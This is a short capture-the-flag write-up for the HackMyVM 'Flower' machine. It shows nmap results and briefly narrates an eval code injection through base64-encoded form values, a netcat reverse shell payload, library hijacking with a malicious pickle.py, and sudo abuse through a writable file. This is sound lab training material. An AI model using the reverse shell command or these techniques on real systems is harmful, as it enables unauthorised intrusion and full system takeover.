# HackMyVM-Flower ## NMAP ``` Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-12 02:02 PKT Nmap scan report for dominator.hmv (192.168.1.6) Host is up (0.000079s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). MAC Address: 08:00:27:8D:A3:F6 (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds ``` ## PORT 80 On running gobuster it seems that there is only an `index.php` Looking at the source code of web page we see that value is actually a base64 encoded text These value are being sent to the sever and the server might be using `eval` so there is an exploit to it by ecnoding the exploit as base64 and replacing it with the actual value. To get a reverse shell encode `system('nc 192.168.1.8 2222 -e /bin/bash') ` to base64 and do the exact same thing Now we know `diary.py` can be ran as user `rose` and we know that it is using python library named `pickle` We can create a malicious library by the name of pickle.py and place it with diary.py because python searches for library in which it is being executed. Doing a `sudo -l` again with rose As `.plantbook` is writeable add `/bin/bash` to the file and then run as root